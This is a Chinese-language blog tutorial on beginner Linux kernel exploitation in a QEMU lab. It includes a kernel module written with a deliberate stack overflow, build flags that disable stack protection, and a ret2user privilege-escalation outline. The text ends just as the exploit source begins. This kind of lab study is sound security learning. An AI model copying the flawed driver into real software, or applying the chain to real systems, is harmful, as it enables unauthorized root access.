

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="bsahfm">
  <meta name="keywords" content="">
  
    <meta name="description" content="​	利用Linux内核中的漏洞，从普通用户态提升到内核态，最终拿到root权限设置控制整个系统。 基础内核kernel：操作系统最核心的部分。 在操作系统课程中也有提到，用户程序不能直接操作硬件（无权限），所以需要依靠内核来完成 其核心任务分为一下五方面：  内存管理 设备驱动管理 进程管理 文件系统管理 系统调用与安全  分级保护环(Ring环)是一种将计算机不同的资源划分至不同权限的模型。（目">
<meta property="og:type" content="article">
<meta property="og:title" content="kernel入门">
<meta property="og:url" content="https://yy-t1.github.io/2026/05/13/kernel%E5%85%A5%E9%97%A8/index.html">
<meta property="og:site_name" content="bsahfm">
<meta property="og:description" content="​	利用Linux内核中的漏洞，从普通用户态提升到内核态，最终拿到root权限设置控制整个系统。 基础内核kernel：操作系统最核心的部分。 在操作系统课程中也有提到，用户程序不能直接操作硬件（无权限），所以需要依靠内核来完成 其核心任务分为一下五方面：  内存管理 设备驱动管理 进程管理 文件系统管理 系统调用与安全  分级保护环(Ring环)是一种将计算机不同的资源划分至不同权限的模型。（目">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://yy-t1.github.io/2026/05/13/kernel%E5%85%A5%E9%97%A8/image-20260513103052533.png">
<meta property="og:image" content="https://yy-t1.github.io/2026/05/13/kernel%E5%85%A5%E9%97%A8/image-20260514175525336.png">
<meta property="og:image" content="https://yy-t1.github.io/2026/05/13/kernel%E5%85%A5%E9%97%A8/image-20260514182423311.png">
<meta property="og:image" content="https://yy-t1.github.io/2026/05/13/kernel%E5%85%A5%E9%97%A8/image-20260514175018734.png">
<meta property="article:published_time" content="2026-05-13T02:12:59.000Z">
<meta property="article:modified_time" content="2026-05-16T06:00:18.875Z">
<meta property="article:author" content="bsahfm">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://yy-t1.github.io/2026/05/13/kernel%E5%85%A5%E9%97%A8/image-20260513103052533.png">
  
  
    <meta name="referrer" content="no-referrer-when-downgrade">
  
  
  <title>kernel入门 - bsahfm</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"yy-t1.github.io","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":"A72cL0RlIkmsXlCGMx51Qi51-gzGzoHsz","app_key":"xxsSPn2ge0tYPU7nwv5Gyd1r","server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  

  

  

  

  

  
    
  



  
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>tyy</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="kernel入门"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2026-05-13 10:12" pubdate>
          2026年5月13日 上午
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          2.4k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          21 分钟
        
      </span>
    

    
    
      
        <span id="leancloud-page-views-container" class="post-meta" style="display: none">
          <i class="iconfont icon-eye" aria-hidden="true"></i>
          <span id="leancloud-page-views"></span> 次
        </span>
        
      
      
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">kernel入门</h1>
            
            
              <div class="markdown-body">
                
                <p>​	利用Linux内核中的漏洞，从普通用户态提升到内核态，最终拿到root权限设置控制整个系统。</p>
<h2 id="基础"><a href="#基础" class="headerlink" title="基础"></a>基础</h2><h3 id="内核"><a href="#内核" class="headerlink" title="内核"></a>内核</h3><p>kernel：操作系统最核心的部分。</p>
<p>在操作系统课程中也有提到，用户程序不能直接操作硬件（无权限），所以需要依靠内核来完成</p>
<p>其核心任务分为一下五方面：</p>
<ol>
<li>内存管理</li>
<li>设备驱动管理</li>
<li>进程管理</li>
<li>文件系统管理</li>
<li>系统调用与安全</li>
</ol>
<h3 id="分级保护环-Ring环"><a href="#分级保护环-Ring环" class="headerlink" title="分级保护环(Ring环)"></a>分级保护环(Ring环)</h3><p>是一种将计算机不同的资源划分至不同权限的模型。（目的是进行权限隔离）</p>
<img src="/2026/05/13/kernel%E5%85%A5%E9%97%A8/image-20260513103052533.png" srcset="/img/loading.gif" lazyload class="" title="image-20260513103052533">



<ul>
<li><strong>Ring 0（最高权限 - 内核态）：</strong><ul>
<li><strong>角色：</strong> 这里的代码拥有对计算机硬件的<strong>绝对控制权</strong>。它可以执行任何 CPU 指令，访问任何内存地址，直接控制网卡、显卡等硬件设备。</li>
<li><strong>运行内容：</strong> 操作系统的核心（Kernel）</li>
</ul>
</li>
<li><strong>Ring 1 和 Ring 2（中间权限）：</strong><ul>
<li><strong>角色：</strong> 操作系统的设备驱动程序或某些系统服务使用，权限介于内核和普通应用之间。</li>
<li><strong>现实情况：</strong> 在现代主流操作系统（如 Windows、Linux、macOS）中，<strong>这两个环几乎被废弃不用</strong>。</li>
</ul>
</li>
<li><strong>Ring 3（最低权限 - 用户态）：</strong><ul>
<li><strong>角色：</strong> 这里的代码受到严格的硬件限制。它不能直接访问硬件，不能修改页表（内存分配），也不能干涉其他程序的运行。如果它试图执行越权指令，CPU 会直接拦截并抛出异常（通常导致程序崩溃退出）。</li>
<li><strong>运行内容：</strong> 所有普通应用程序（微信、浏览器、游戏、甚至是编写的 Python&#x2F;C++ 代码）都运行在这里。</li>
</ul>
</li>
</ul>
<h4 id="用户态（Ring3）—-内核态（Ring0）："><a href="#用户态（Ring3）—-内核态（Ring0）：" class="headerlink" title="用户态（Ring3）—&gt;内核态（Ring0）："></a>用户态（Ring3）—&gt;内核态（Ring0）：</h4><h5 id="中断"><a href="#中断" class="headerlink" title="中断"></a>中断</h5><p>硬件&#x2F;异常主动打断CPU</p>
<p>执行过程：</p>
<ol>
<li>发生中断</li>
<li>CPU保存现场</li>
<li>切换到内核态</li>
<li>查中断向量表</li>
<li>执行中断服务程序</li>
<li>恢复现场</li>
</ol>
<h5 id="系统调用"><a href="#系统调用" class="headerlink" title="系统调用"></a>系统调用</h5><p>用户程序合法地主动请求内核完成某些特权服务</p>
<p>（比如程序常使用的某些函数：open，write，read等等）</p>
<p>可以参考ctf-pwn里的retsyscall</p>
<p>执行过程：</p>
<ol>
<li>用户态通过syscall请求内核服务（调用某些库函数也是）</li>
<li>设置系统调用号</li>
<li>执行特殊指令（进入内核态）</li>
<li>内核根据syscall number来实现</li>
<li>内核执行</li>
<li>返回用户态</li>
</ol>
<h4 id="内核态（Ring0）—-用户态（Ring3）"><a href="#内核态（Ring0）—-用户态（Ring3）" class="headerlink" title="内核态（Ring0）—&gt;用户态（Ring3）"></a>内核态（Ring0）—&gt;用户态（Ring3）</h4><p>使用特权返回指令。</p>
<p>（返回之前会恢复一系列寄存器）</p>
<h2 id="环境模拟"><a href="#环境模拟" class="headerlink" title="环境模拟"></a>环境模拟</h2><p>真实的kernel里限制太多了，我们用于学习kernel pwn的小程序可能因为各种条件与kernel保护机制实现不起来，所以我们得自己用qemu模拟一下小的内核环境来测试。</p>
<img src="/2026/05/13/kernel%E5%85%A5%E9%97%A8/image-20260514175525336.png" srcset="/img/loading.gif" lazyload class="" title="image-20260514175525336">

<p>其实用qemu模拟kernel环境总共就需要三样东西：</p>
<p>1.rootfs.cpio.gz：打包好的文件系统，作为模拟的内核环境的文件系统</p>
<p>2.bzImage：Linux内核编译后的可引导压缩内核镜像文件</p>
<p>3.run.sh：启动qemu的脚本</p>
<p>一开始我直接cp自己本机的bzImage，这就导致模拟出来的内核环境与本机基本相似，限制太多了，所以得自己下载linux内核源码，自己配置自己编译。</p>
<p>（具体教程网上一堆，不想赘述）</p>
<h3 id="init程序"><a href="#init程序" class="headerlink" title="init程序"></a>init程序</h3><p>在rootfs文件夹，也就是我们用来模拟的系统根目录里必须要有init这么一个程序。</p>
<p>因为：</p>
<p>Linux本身只是一个底层的基础设施（负责管理内存、CPU 调度、驱动硬件等），当内核完成自身的初始化后并不能提供给我们用户一个敲命令的命令行，所以我们需要让内核在初始化后就启动这个程序，用于将控制权交给用户。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-meta">#!/bin/sh</span><br><br>//挂载伪文件系统<br>mount -t proc proc /proc<br>mount -t sysfs sysfs /sys<br>mount -t devtmpfs devtmpfs /dev<br><br><span class="hljs-built_in">echo</span> <span class="hljs-string">&quot;==================================&quot;</span><br><span class="hljs-built_in">echo</span> <span class="hljs-string">&quot; Kernel Pwn Lab Boot Success &quot;</span><br><span class="hljs-built_in">echo</span> <span class="hljs-string">&quot;==================================&quot;</span><br><br>//为串口设备（终端）提权，使得普通用户也能使用<br><span class="hljs-built_in">chmod</span> 666 /dev/ttyS0 2&gt;/dev/null<br><br>//弹出交互式shell<br>setsid /bin/sh<br></code></pre></td></tr></table></figure>

<h3 id="run-sh"><a href="#run-sh" class="headerlink" title="run.sh"></a>run.sh</h3><p>qemu的运行脚本，还可以加入-s（进行gdb调试）等等</p>
<p>具体需要加什么因需而改即可</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-meta">#!/bin/bash</span><br><br>qemu-system-x86_64 \<br>-m 256M \<br>-kernel ./bzImage \<br>-initrd ./rootfs.cpio.gz \<br>-append <span class="hljs-string">&quot;console=ttyS0 nokaslr panic=1&quot;</span> \<br>-nographic \<br>-monitor /dev/null \<br>-no-reboot \<br></code></pre></td></tr></table></figure>

<p>直接在终端.&#x2F;run.sh即可</p>
<h3 id="gdb调试"><a href="#gdb调试" class="headerlink" title="gdb调试"></a>gdb调试</h3><p>通常情况下，我们还需要使用gdb调试我们的exp</p>
<p>这时候就需要更改run.sh启动脚本，加上<code>-s -S</code>开启调试接口</p>
<p>（改进：<code>-gdb tcp::12345 \</code> ）</p>
<figure class="highlight smali"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs smali">运行的是bzImage，但是调试利用包含完整调试符号的vmlinux<br>gdb vmlinux<br><br>target remote<span class="hljs-keyword"> :</span> 1234<br><br>动态加载模块符号，不然全是指令很难调试<span class="hljs-built_in"></span><br><span class="hljs-built_in">add-symbol-file </span>/home/tyy/桌面/fake_kernel/rootfs/vuln_mod.ko 0xffffffffa0000000<br>（cat /proc/modules查看该模块的地址）<br><br>我测试的vuln_write的具体地址<br>b *0xffffffffa0000070<br>（objdump -t vuln_mod.ko | grep vuln_write）<br></code></pre></td></tr></table></figure>

<p>然后正常打断点调试即可</p>
<h2 id="基础的kernel-pwn"><a href="#基础的kernel-pwn" class="headerlink" title="基础的kernel pwn"></a>基础的kernel pwn</h2><p>代码来自Gemini。</p>
<p>（感觉C语言功底要求较高，内核态的代码不是很看得懂，多接触接触吧）</p>
<p>kernel里的驱动是常见的含漏洞的程序，这里以编写某个驱动程序载入内核，再通过利用它存在的漏洞来达到提权的目的。</p>
<figure class="highlight arduino"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><code class="hljs arduino"><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;linux/module.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;linux/kernel.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;linux/fs.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;linux/uaccess.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> DEVICE_NAME <span class="hljs-string">&quot;vuln_device&quot;</span></span><br><span class="hljs-type">static</span> <span class="hljs-type">int</span> major_num;<br><br><span class="hljs-comment">// 漏洞函数：内核态的 write 操作</span><br><span class="hljs-function"><span class="hljs-type">static</span> <span class="hljs-type">ssize_t</span> <span class="hljs-title">vuln_write</span><span class="hljs-params">(<span class="hljs-keyword">struct</span> file *file, <span class="hljs-type">const</span> <span class="hljs-type">char</span> __user *buf, <span class="hljs-type">size_t</span> len, <span class="hljs-type">loff_t</span> *offset)</span> </span>&#123;<br>    <span class="hljs-type">char</span> kbuf[<span class="hljs-number">64</span>]; <span class="hljs-comment">// 内核栈上分配了 64 字节的缓冲区</span><br><br>    <span class="hljs-built_in">printk</span>(KERN_INFO <span class="hljs-string">&quot;[VulnMod] vuln_write called, length: %zu\n&quot;</span>, len);<br><br>    <span class="hljs-comment">// 💥 致命漏洞：直接信任了用户传来的 len 参数，没有任何边界检查！</span><br>    <span class="hljs-comment">// 如果 len &gt; 64，多出来的数据就会向高地址覆盖，破坏内核栈上的 Saved RBP 和 Return Address (RIP)</span><br>    <span class="hljs-built_in">memcpy</span>(kbuf, buf, len);<br><br>    <span class="hljs-built_in">printk</span>(KERN_INFO <span class="hljs-string">&quot;[VulnMod] Data copied successfully.\n&quot;</span>);<br>    <span class="hljs-keyword">return</span> len;<br>&#125;<br><br><span class="hljs-type">static</span> <span class="hljs-keyword">struct</span> <span class="hljs-title class_">file_operations</span> fops = &#123;<br>    .write = vuln_write,<br>&#125;;<br><br><span class="hljs-function"><span class="hljs-type">static</span> <span class="hljs-type">int</span> __init <span class="hljs-title">vuln_init</span><span class="hljs-params">(<span class="hljs-type">void</span>)</span> </span>&#123;<br>    major_num = <span class="hljs-built_in">register_chrdev</span>(<span class="hljs-number">0</span>, DEVICE_NAME, &amp;fops);<br>    <span class="hljs-built_in">printk</span>(KERN_INFO <span class="hljs-string">&quot;[VulnMod] Loaded. Major: %d\n&quot;</span>, major_num);<br>    <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>&#125;<br><br><span class="hljs-function"><span class="hljs-type">static</span> <span class="hljs-type">void</span> __exit <span class="hljs-title">vuln_exit</span><span class="hljs-params">(<span class="hljs-type">void</span>)</span> </span>&#123;<br>    <span class="hljs-built_in">unregister_chrdev</span>(major_num, DEVICE_NAME);<br>    <span class="hljs-built_in">printk</span>(KERN_INFO <span class="hljs-string">&quot;[VulnMod] Unloaded.\n&quot;</span>);<br>&#125;<br><br><span class="hljs-built_in">module_init</span>(vuln_init);<br><span class="hljs-built_in">module_exit</span>(vuln_exit);<br><span class="hljs-built_in">MODULE_LICENSE</span>(<span class="hljs-string">&quot;GPL&quot;</span>);<br></code></pre></td></tr></table></figure>

<p>这里一开始用的copy_from_user,但是过于安全（具体为啥我也还不知道）反正就是用这个不能成功栈溢出，所以改为memcpy了</p>
<h3 id="载入驱动"><a href="#载入驱动" class="headerlink" title="载入驱动"></a>载入驱动</h3><p>在我们模拟的系统中，是只存在一些基础的指令的</p>
<img src="/2026/05/13/kernel%E5%85%A5%E9%97%A8/image-20260514182423311.png" srcset="/img/loading.gif" lazyload class="" title="image-20260514182423311">

<p>所以在qemu模拟系统里面直接写这些程序并编译都是相对麻烦的，所以就需要先在本机都将驱动（目标程序）与exp都写好编译好，都放入文件系统再打包进入成rootfs.cpio.gz比较方便</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs bash">一键打包<br><span class="hljs-built_in">cd</span> rootfs<br>find . | cpio -o --format=newc | gzip &gt; ../rootfs.cpio<br><span class="hljs-built_in">cd</span> ..<br><br>载入vuln_mod.ko驱动<br>insmod vuln_mod.ko（248）<br><br>创建设备文件使得内核模块能被用户态程序访问<br><span class="hljs-built_in">mknod</span> /dev/vuln_device c 248 0<br><span class="hljs-built_in">chmod</span> 666 /dev/vuln_device<br><br>（改进创建）<br><span class="hljs-built_in">mknod</span> -m 666 /dev/holstein c `grep holstein /proc/devices | awk <span class="hljs-string">&#x27;&#123;print $1;&#125;&#x27;</span>` 0<br></code></pre></td></tr></table></figure>

<p>这里还得留意，我们写的是vuln_mod.c，编译成.ko文件需要依靠Makefile</p>
<p>Makefile：</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">obj</span>-m += vuln_mod.o<br><br><span class="hljs-attribute">ccflags</span>-y += -fno-stack-protector<br><span class="hljs-attribute">ccflags</span>-y += -O0<br><span class="hljs-attribute">ccflags</span>-y += -g<br><br><span class="hljs-attribute">all</span>:<br>	<span class="hljs-attribute">make</span> -C ./linux-<span class="hljs-number">5</span>.<span class="hljs-number">15</span>.<span class="hljs-number">153</span> M=$(PWD) modules<br><br><span class="hljs-attribute">clean</span>:<br>	<span class="hljs-attribute">make</span> -C ./linux-<span class="hljs-number">5</span>.<span class="hljs-number">15</span>.<span class="hljs-number">153</span> M=$(PWD) clean<br></code></pre></td></tr></table></figure>

<p>（必须通过对于的内核版本编译才能在对应的内核环境下加载该驱动）</p>
<h3 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h3><p>在驱动程序里，存在一个栈溢出，在关闭了一系列栈溢出保护机制后了可以实现控制返回地址。</p>
<p>那么就利用经典的<strong>Ret2User（Return-to-User，返回用户态）</strong>：</p>
<figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><code class="hljs stylus">用户态 <span class="hljs-selector-tag">main</span>()<br><br>↓<br><span class="hljs-function"><span class="hljs-title">write</span><span class="hljs-params">(fd, buf, <span class="hljs-number">80</span>)</span></span><br><br>↓<br>进入内核态（syscall）<br><br>↓<br><span class="hljs-function"><span class="hljs-title">vuln_write</span><span class="hljs-params">()</span></span><br><br>↓<br>memcpy 栈溢出<br><br>↓<br>覆盖返回地址 RIP<br><br>↓<br>ret 到 <span class="hljs-built_in">payload</span>()<br><br>↓<br>payload 在 Ring0 执行<br><br>↓<br><span class="hljs-function"><span class="hljs-title">commit_creds</span><span class="hljs-params">(prepare_kernel_cred(NULL)</span></span>)<br><br>↓<br>当前进程变 root<br><br>↓<br>手工构造 iretq 返回栈<br><br>↓<br>回到 Ring3<br><br>↓<br>执行 <span class="hljs-built_in">get_shell</span>()<br><br>↓<br>root shell<br></code></pre></td></tr></table></figure>



<p>这里需要用到两个地址（前提是没有内核地址随机化）用来构造经典的提权公式：</p>
<figure class="highlight gradle"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs gradle">提权公式<br>commit_creds(prepare_kernel_cred(<span class="hljs-keyword">NULL</span>))<br><br>查看地址<br>cat <span class="hljs-regexp">/proc/</span>kallsyms | <span class="hljs-keyword">grep</span> prepare_kernel_cred<br>cat <span class="hljs-regexp">/proc/</span>kallsyms | <span class="hljs-keyword">grep</span> commit_creds<br></code></pre></td></tr></table></figure>



<p>exp：</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br></pre></td><td class="code"><pre><code class="hljs cpp"><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;stdio.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;stdlib.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;unistd.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;fcntl.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;string.h&gt;</span></span><br><br><span class="hljs-comment">// 替换为你通过 /proc/kallsyms 查到的实际地址</span><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> COMMIT_CREDS_ADDR 0xffffffff81096700</span><br><span class="hljs-meta">#<span 